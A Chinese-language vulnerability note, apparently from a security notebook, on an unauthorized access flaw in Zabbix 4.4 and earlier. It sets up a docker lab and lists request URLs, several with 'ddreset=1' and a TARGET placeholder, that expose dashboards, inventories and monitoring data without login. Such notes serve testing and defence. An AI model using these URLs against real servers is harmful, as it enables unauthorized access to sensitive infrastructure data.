# Zabbix未授权访问漏洞

## 漏洞描述

Zabbix存在一个未授权访问漏洞，通过该漏洞，攻击者可以在未经授权的情况下访问Zabbix服务器上的数据，导致敏感信息泄露。

## **影响版本**

Zabbix <= 4.4

## 环境搭建

```
docker run -p 10051:10051  -p 80:80 zabbix/zabbix-appliance:ubuntu-4.0.12
```

## 漏洞利用

访问：<http://192.168.32.183/zabbix.php?action=problem.view\\&ddreset=1>

![image-20220726150813375](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-74a30c9b5f522f6ad5d935cc435a31fd21dd1b82%2Fimage-20220726150813375.png?alt=media)

访问：<http://192.168.32.183/overview.php?ddreset=1>

![image-20220726150910028](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-c96ab3b8e2f7e71d9603ff9a795aab37534a5703%2Fimage-20220726150910028.png?alt=media)

访问：<http://192.168.32.183/latest.php?ddreset=1>

![image-20220726150855422](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-d12296e3165c42726095983736db265fc588b7d8%2Fimage-20220726150855422.png?alt=media)

还有以下链接可以访问：

* <https://TARGET/zabbix/zabbix.php?action=dashboard.view>
* <https://TARGET/zabbix/zabbix.php?action=dashboard.view\\&ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=problem.view\\&ddreset=1>
* <https://TARGET/zabbix/overview.php?ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=web.view\\&ddreset=1>
* <https://TARGET/zabbix/latest.php?ddreset=1>
* <https://TARGET/zabbix/charts.php?ddreset=1>
* <https://TARGET/zabbix/screens.php?ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=map.view\\&ddreset=1>
* <https://TARGET/zabbix/srv\\_status.php?ddreset=1>
* <https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1>
* <https://TARGET/zabbix/hostinventories.php?ddreset=1>
* <https://TARGET/zabbix/report2.php?ddreset=1>
* <https://TARGET/zabbix/toptriggers.php?ddreset=1>
* <https://TARGET/zabbix/zabbix.php?action=dashboard.list>
* <https://TARGET/zabbix/zabbix.php?action=dashboard.view\\&dashboardid=1>